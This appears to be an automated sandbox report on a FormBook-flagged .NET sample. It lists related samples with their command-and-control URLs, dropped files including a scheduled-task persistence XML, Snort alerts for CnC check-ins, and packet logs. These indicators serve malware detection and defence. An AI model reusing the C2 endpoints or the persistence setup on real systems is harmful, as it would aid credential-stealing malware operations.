                                            • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.50.102.62, 67.27.141.126, 8.248.119.254, 8.238.85.126, 8.248.139.254, 8.238.85.254, 40.112.88.60, 23.216.77.209, 23.216.77.208
                                            • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483617/sample/tgamf4XuLa.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            10:08:32API Interceptor1x Sleep call for process: tgamf4XuLa.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            91.195.240.94Payment.exeGet hashmaliciousBrowse
                                            • www.cevicheatl.com/pm7s/?v2J83=dDHD9XVxev94&-Zi=VaPpcx8n3Tp8D9xgbNtl8vulXgBvw8jFIvpULVCQhIlh0W4Hjuc6qrQSfYpFlZollCUL
                                            pronto per il pagamento.exeGet hashmaliciousBrowse
                                            • www.kosha2030.com/cb3b/?hV2=rqbUo6j2KmhlDLlvmj6v60cfZ8/2Wb9u+KYnQWuAInoB2FLYYFx1yPNzvLEIuH4s1sVu&2d_HDh=b4KXxR6XiV5lmHh0
                                            PO-PT. Hextar-Sept21.xlsxGet hashmaliciousBrowse
                                            • www.garfld.com/imi7/?bVx=AFMvowp2dypQPpLZR6/sAbLaaLiFVzdlH2gx+8GSqBhOmfQ8NBa2GdB0GH1Hzk2pvxNNYQ==&Nx=8pFdqHyxnZUl
                                            P.O100%uFFFDpayment.doc__.rtfGet hashmaliciousBrowse
                                            • www.cis-thailand.com/crg3/?9rWP=SnroaQgsYxMLiTImvCpI1Gl07kg1+3LZiriLgRT6WM6KSYrus5bHWYAPsUyD9HyCzSS3+w==&wTcHGb=ylr8U6ypj
                                            Quotation Required Details.exeGet hashmaliciousBrowse
                                            • www.promosplace.com/p4se/?l2Mdnb=g+K9AOIBn0/VHfOvEruut/gc0uElQ8afuAuUP1bYE2eC/PWXrO3ELwGMR3TL6eUTg0Vn&fFQL=6lZPcVbxGH
                                            DUE INVOICES.exeGet hashmaliciousBrowse
                                            • www.mgm2348543.com/b6cu/?R2MD6=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7fmeqANspZbM&BT=2dhhnfvPB6f8zBxp
                                            Order_confirmation_ SMKT 09062021_.exeGet hashmaliciousBrowse
                                            • www.preaked.com/h2m4/?2d=HxKWzMaF1BWGIaYUxE2WWBBllJBIGc2hs3LD5EFS7XDw0kpNhCyQgmCJtlxKKPUpl4+d&D2MH9=9rWdhfN8M
                                            nFzJnfmTNh.exeGet hashmaliciousBrowse
                                            • www.mgm2348543.com/b6cu/?aT=jvQLaT&MD=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL
                                            0039234_00533MXS2.exeGet hashmaliciousBrowse
                                            • www.dandhgh.com/m64e/?H2MDD=hQTNvBW47KQ9P36N1I31K6xMq6TLiyTboYpfo/Bbm9l3Z3kS2jzEmMODUoxriuOWTqDJ&DxoLn=7nU4v4ghr2A8WLZ
                                            Unpaid Invoice.exeGet hashmaliciousBrowse
                                            • www.mgm2348543.com/b6cu/?WFN=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL&Sjlpi=9ruD_h9
                                            174jAWlXyW.exeGet hashmaliciousBrowse
                                            • www.bharathub.net/b6cu/?f2M=_v-HI&9r=vUP3bPk6qVMFSBZsu0WoakUB9ZLAJM2aLct125UMa7nObtIS9UcRmSBQP/rfZ6EDwLD9
                                            Payment Advice.xlsxGet hashmaliciousBrowse
                                            • www.mgm2348543.com/b6cu/?O8=-ZcPjPvhqPppnvL&bzu4_=dqsOYsWVq5FXUo6DYO7UsXHrG00vcvVIPPqXZD6UV3Cojp7qddL1qZML45qYhxZn8/v7Kg==
                                            RFQ_PO_009890_pdf.exeGet hashmaliciousBrowse
                                            • www.swipehawk.com/a6hg/?Gz=UharbDuqOmkTaf35LjnpLxSjggODaklpW9Y+tG2s+LMkdYLf42pUDMwAxcb4x47jVGJ2VGfNbQ==&-ZsLG=3ff8xpG0DPWtZdZ
                                            Swift Copy.exeGet hashmaliciousBrowse
                                            • www.mgm2348543.com/b6cu/?2dSpM=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL&PVvtW=7nWhA
                                            LC copy, Terms conditions.xlsxGet hashmaliciousBrowse
                                            • www.wqfilter.com/i7dg/?BBJ43b=f8iD9L4afkGSBNeT1a2zV06Ib9jyqzB9Ki8lcYXtvMA4ssIJMUtZ9Lijkg3d2xO4598lPA==&4hExr=GBXdRHy8-0z0
                                            Order sheet 31082021.exeGet hashmaliciousBrowse
                                            • www.promosplace.com/p4se/?H0D=v48Tu4dpfV5&F8R8gJ=g+K9AOIBn0/VHfOvEruut/gc0uElQ8afuAuUP1bYE2eC/PWXrO3ELwGMR3TL6eUTg0Vn
                                            PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                                            • www.hostings.company/n58i/?7nxhvxdX=m2fUwKHXntk7+v0FXrNTEkwXJjJFTAENR7+CI2dV9M7+9BuBSatPMImaRSslo8DZxWmb&z0D83b=1butZX4hMzCL_
                                            Shipment Advise 20035506.exeGet hashmaliciousBrowse
                                            • www.hostings.company/n58i/?CRmti4J=m2fUwKHXntk7+v0FXrNTEkwXJjJFTAENR7+CI2dV9M7+9BuBSatPMImaRRAm0MPh83bNGIKsaA==&EDHH=SL3Xb8KPdN
                                            PO 4100066995.exeGet hashmaliciousBrowse
                                            • www.vaca.travel/bp39/?nVR=5Qm4YdS9nP4uT06ysd2e9bB4EWW6DLhAof8Noh1nKxRE1PX3o+aVuPjzTEVLAN9Xs7Ly&fFNDaX=7nmPgJPxr
                                            uXNn71mPwRw5qVi.exeGet hashmaliciousBrowse
                                            • www.anacshops.com/z01e/?9rgLWb38=UkWWCKefa2QBOILDZj1DEjSIa8P8jMrEvFnGp+Vhsnwupfyaki4wDZ8Hwm0s3MMh54tn&Sjlpd=9ruDZ

                                            Domains

                                            No context

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AMAZON-02USSRMETALINDUSTRIES.exeGet hashmaliciousBrowse
                                            • 44.227.65.245
                                            PI L032452021xxls.exeGet hashmaliciousBrowse
                                            • 99.83.154.118
                                            Unpaid invoice.exeGet hashmaliciousBrowse
                                            • 99.83.154.118
                                            FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                            • 3.139.50.24
                                            FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                            • 3.139.50.24
                                            Elon Musk Club - 024705 .htmGet hashmaliciousBrowse
                                            • 13.226.156.103
                                            PGQBjDmDZ4Get hashmaliciousBrowse
                                            • 34.249.145.219
                                            m5DozqUO2tGet hashmaliciousBrowse
                                            • 54.70.167.99
                                            avxeC9WssiGet hashmaliciousBrowse
                                            • 13.52.148.225
                                            Wh3hrPWbBGGet hashmaliciousBrowse
                                            • 34.249.145.219
                                            re2.x86Get hashmaliciousBrowse
                                            • 184.77.232.100
                                            re2.arm7Get hashmaliciousBrowse
                                            • 63.32.132.1
                                            Fourlokov9.x86Get hashmaliciousBrowse
                                            • 34.249.145.219
                                            re2.x86Get hashmaliciousBrowse
                                            • 54.96.126.50
                                            re2.armGet hashmaliciousBrowse
                                            • 18.226.174.198
                                            XbvAoRKnFm.exeGet hashmaliciousBrowse
                                            • 52.218.0.168
                                            Enclosed.xlsxGet hashmaliciousBrowse
                                            • 13.238.159.178
                                            HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousBrowse
                                            • 3.139.183.122
                                            debit.xlsxGet hashmaliciousBrowse
                                            • 52.77.232.215
                                            UPDATED e-STATEMENT.exeGet hashmaliciousBrowse
                                            • 75.2.37.224
                                            SEDO-ASDEPayment.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            PAYSLIP.exeGet hashmaliciousBrowse
                                            • 91.195.240.117
                                            UPDATED e-STATEMENT.exeGet hashmaliciousBrowse
                                            • 91.195.240.87
                                            2021091400983746_pdf.exeGet hashmaliciousBrowse
                                            • 91.195.240.13
                                            pronto per il pagamento.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            ENQUIRYSMRT119862021-ERW PIPES.pdf.exeGet hashmaliciousBrowse
                                            • 91.195.240.13
                                            ryfAIJHmKETyAPz.exeGet hashmaliciousBrowse
                                            • 91.195.240.87
                                            NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeGet hashmaliciousBrowse
                                            • 91.195.240.117
                                            PO-PT. Hextar-Sept21.xlsxGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            P.O100%uFFFDpayment.doc__.rtfGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            Data Sheet and Profile.exeGet hashmaliciousBrowse
                                            • 91.195.240.117
                                            Order 45789011.exeGet hashmaliciousBrowse
                                            • 91.195.240.13
                                            Quotation Required Details.exeGet hashmaliciousBrowse
                                            • 91.195.240.94
                                            54U89TvWvD.exeGet hashmaliciousBrowse
                                            • 91.195.240.87
                                            Order no.1480-G22-21202109.xlsxGet hashmaliciousBrowse
                                            • 91.195.240.117
                                            BK8476699_BOOKING.exeGet hashmaliciousBrowse
                                            • 91.195.240.87
                                            Swift 07.09.21.exeGet hashmaliciousBrowse
                                            • 91.195.240.87
                                            Required quantity.docGet hashmaliciousBrowse
                                            • 91.195.240.117
                                            chUG6brzt9.exeGet hashmaliciousBrowse
                                            • 91.195.240.117
                                            BahcfFNy25bmV1c.exeGet hashmaliciousBrowse
                                            • 91.195.240.13

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tgamf4XuLa.exe.log
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1642
                                            Entropy (8bit):5.193011313049836
                                            Encrypted:false
                                            SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBWtn:cbh47TlNQ//rydbz9I3YODOLNdq32
                                            MD5:CD336816B8CEB455A42F961A8F08D0D7
                                            SHA1:E6C59289EB46C0E12240D674A4230F83A632ABEB
                                            SHA-256:4056571BCD25053290D7350F6A47757771FED7F84F5C1A5B0EFAB382FBD56217
                                            SHA-512:9A2B4A596DF487B296618B1CD05A8EF0AA83216A480A0F5C9E5D708DC7B62D71321D3E6E16BA291202E0F7D212E11194334EA6A20CB4B3BC77751854CE0560A8
                                            Malicious:true
                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                            C:\Users\user\AppData\Roaming\HpnpObXJP.exe
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):548352
                                            Entropy (8bit):7.150010822520698
                                            Encrypted:false
                                            SSDEEP:12288:MWHCM2K4C2+XhqZ5G8n1wI1Sazqyjxg5QLN:83C2+xqm8l9zqyFgiL
                                            MD5:F8146A71DEDC3EEEAA1624D6832C39A4
                                            SHA1:B1007A3BEAB21C77513BB9C4E6FC2A04C6346C04
                                            SHA-256:3611C1A2E9D1897825D5E7100A1C01D807F62A9C75D5F12602C168B0726D56CA
                                            SHA-512:EB4D38153E98FB9744B2AB9496E8A084E83C0202639823B2DE5FCDA7609221918D2615AD572F007C0F4A62D363E2362936B585BE1E09462FA299DFAC69FC2654
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0..T...........r... ........@.. ....................................@.................................pr..O...................................Tr............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................r......H........?...^......o...L...............................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........ro..p.+..*..0..................+..*".(.....*....0..
                                            C:\Users\user\AppData\Roaming\HpnpObXJP.exe:Zone.Identifier
                                            Process:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview: [ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.150010822520698
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:tgamf4XuLa.exe
                                            File size:548352
                                            MD5:f8146a71dedc3eeeaa1624d6832c39a4
                                            SHA1:b1007a3beab21c77513bb9c4e6fc2a04c6346c04
                                            SHA256:3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
                                            SHA512:eb4d38153e98fb9744b2ab9496e8a084e83c0202639823b2de5fcda7609221918d2615ad572f007c0f4a62d363e2362936b585be1e09462fa299dfac69fc2654
                                            SSDEEP:12288:MWHCM2K4C2+XhqZ5G8n1wI1Sazqyjxg5QLN:83C2+xqm8l9zqyFgiL
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0..T...........r... ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4872c2
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x960770CE [Tue Oct 5 18:07:10 2049 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x872700x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x5a4.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x872540x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x852c80x85400False0.75722986046data7.16093944862IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x880000x5a40x600False0.419270833333data4.05521631132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x880900x314data
                                            RT_MANIFEST0x883b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2019
                                            Assembly Version1.0.0.0
                                            InternalNameFormatt.exe
                                            FileVersion1.0.0.0
                                            CompanyName
                                            LegalTrademarks
                                            Comments
                                            ProductNameDisciples
                                            ProductVersion1.0.0.0
                                            FileDescriptionDisciples
                                            OriginalFilenameFormatt.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            09/15/21-10:09:58.335857TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.352.25.92.0
                                            09/15/21-10:09:58.335857TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.352.25.92.0
                                            09/15/21-10:09:58.335857TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.352.25.92.0
                                            09/15/21-10:10:03.777625TCP1201ATTACK-RESPONSES 403 Forbidden804978199.83.154.118192.168.2.3
                                            09/15/21-10:10:08.965113TCP1201ATTACK-RESPONSES 403 Forbidden804978234.98.99.30192.168.2.3
                                            09/15/21-10:10:14.181255TCP1201ATTACK-RESPONSES 403 Forbidden804978734.98.99.30192.168.2.3
                                            09/15/21-10:10:30.286043TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.334.102.136.180
                                            09/15/21-10:10:30.286043TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.334.102.136.180
                                            09/15/21-10:10:30.286043TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.334.102.136.180
                                            09/15/21-10:10:30.401585TCP1201ATTACK-RESPONSES 403 Forbidden804979034.102.136.180192.168.2.3
                                            09/15/21-10:10:40.511246TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.399.83.154.118
                                            09/15/21-10:10:40.511246TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.399.83.154.118
                                            09/15/21-10:10:40.511246TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979180192.168.2.399.83.154.118
                                            09/15/21-10:10:40.680718TCP1201ATTACK-RESPONSES 403 Forbidden804979199.83.154.118192.168.2.3
                                            09/15/21-10:10:45.754266TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.334.98.99.30
                                            09/15/21-10:10:45.754266TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.334.98.99.30
                                            09/15/21-10:10:45.754266TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.334.98.99.30
                                            09/15/21-10:10:45.871161TCP1201ATTACK-RESPONSES 403 Forbidden804979234.98.99.30192.168.2.3
                                            09/15/21-10:10:50.931049TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.391.195.240.94
                                            09/15/21-10:10:50.931049TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.391.195.240.94
                                            09/15/21-10:10:50.931049TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.391.195.240.94

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 15, 2021 10:09:58.142708063 CEST4978080192.168.2.352.25.92.0
                                            Sep 15, 2021 10:09:58.335076094 CEST804978052.25.92.0192.168.2.3
                                            Sep 15, 2021 10:09:58.335562944 CEST4978080192.168.2.352.25.92.0
                                            Sep 15, 2021 10:09:58.335856915 CEST4978080192.168.2.352.25.92.0
                                            Sep 15, 2021 10:09:58.520380974 CEST804978052.25.92.0192.168.2.3
                                            Sep 15, 2021 10:09:58.520955086 CEST804978052.25.92.0192.168.2.3
                                            Sep 15, 2021 10:09:58.520979881 CEST804978052.25.92.0192.168.2.3
                                            Sep 15, 2021 10:09:58.521400928 CEST804978052.25.92.0192.168.2.3
                                            Sep 15, 2021 10:09:58.524154902 CEST4978080192.168.2.352.25.92.0
                                            Sep 15, 2021 10:09:58.524269104 CEST4978080192.168.2.352.25.92.0
                                            Sep 15, 2021 10:09:58.708976984 CEST804978052.25.92.0192.168.2.3
                                            Sep 15, 2021 10:10:03.599700928 CEST4978180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:03.618251085 CEST804978199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:03.618488073 CEST4978180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:03.618793011 CEST4978180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:03.637415886 CEST804978199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:03.777625084 CEST804978199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:03.777683973 CEST804978199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:03.779618979 CEST4978180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:03.779794931 CEST4978180192.168.2.399.83.154.118
                                            Sep 15, 2021 10:10:03.800842047 CEST804978199.83.154.118192.168.2.3
                                            Sep 15, 2021 10:10:08.829628944 CEST4978280192.168.2.334.98.99.30
                                            Sep 15, 2021 10:10:08.848478079 CEST804978234.98.99.30192.168.2.3
                                            Sep 15, 2021 10:10:08.849801064 CEST4978280192.168.2.334.98.99.30
